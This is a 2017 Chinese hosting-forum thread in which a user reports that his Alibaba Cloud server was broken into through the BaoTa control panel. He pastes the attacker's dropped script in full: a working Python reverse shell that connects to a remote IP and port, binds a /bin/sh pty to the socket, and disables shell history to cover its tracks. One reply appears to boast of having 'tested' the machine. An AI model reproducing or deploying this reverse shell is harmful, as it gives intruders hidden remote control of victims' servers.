全球主机交流论坛

标题: 有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia [打印本页]
作者: 宝创    时间: 2017-1-20 10:11
标题: 有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia
难道是宝塔的bug?
他先登陆了宝塔 然后建了个b.py
但是宝塔我都更改了默认用户名的 他还是用admin登陆成功了
然后登陆了ssh 我正准备睡觉呢 收到了阿里云的通知 我就先关机了
py内容

  2. # -*- coding:utf-8 -*-
  3. #!/usr/bin/env python
  4. """
  5. back connect py version,only linux have pty module
  6. code by google security team
  7. """
  8. import sys,os,socket,pty
  9. shell = "/bin/sh"
  10. def usage(name):
  11.     print 'python reverse connector'
  12.     print 'usage: %s <ip_addr> <port>' % name

  14. def main():
  15.     if len(sys.argv) < 3:
  16.         usage(sys.argv[0])
  17.         sys.exit()
  18.     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  19.     try:
  20.         if sys.argv[3] == 'udp' :
  21.             s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  22.     except:pass
  23.     try:
  24.         s.connect((sys.argv[1],int(sys.argv[2])))
  25.         print 'connect ok'
  26.     except:
  27.         print 'connect faild'
  28.         sys.exit()
  29.     os.dup2(s.fileno(),0)
  30.     os.dup2(s.fileno(),1)
  31.     os.dup2(s.fileno(),2)
  32.     global shell
  33.     os.unsetenv("HISTFILE")
  34.     os.unsetenv("HISTFILESIZE")
  35.     os.unsetenv("HISTSIZE")
  36.     os.unsetenv("HISTORY")
  37.     os.unsetenv("HISTSAVE")
  38.     os.unsetenv("HISTZONE")
  39.     os.unsetenv("HISTLOG")
  40.     os.unsetenv("HISTCMD")
  41.     os.putenv("HISTFILE",'/dev/null')
  42.     os.putenv("HISTSIZE",'0')
  43.     os.putenv("HISTFILESIZE",'0')
  44.     pty.spawn(shell)
  45.     s.close()

  47. if __name__ == '__main__':
  48.     main()
复制代码

阿里云
(, 下载次数: 2)
作者: liangcq132    时间: 2017-1-20 10:22
是哪个mjj这么厉害
作者: tsk    时间: 2017-1-20 13:55
不明觉厉!
作者: qweasdzxc123    时间: 2017-1-20 13:58
楼下对此事负责
作者: lsza    时间: 2017-1-20 14:08
宝塔用完了我一般都是删面板..
作者: modianxia    时间: 2017-1-20 16:07
测试到mjj的机器了,哈哈



欢迎光临 全球主机交流论坛 (https://52.ht/) Powered by Discuz! X3.4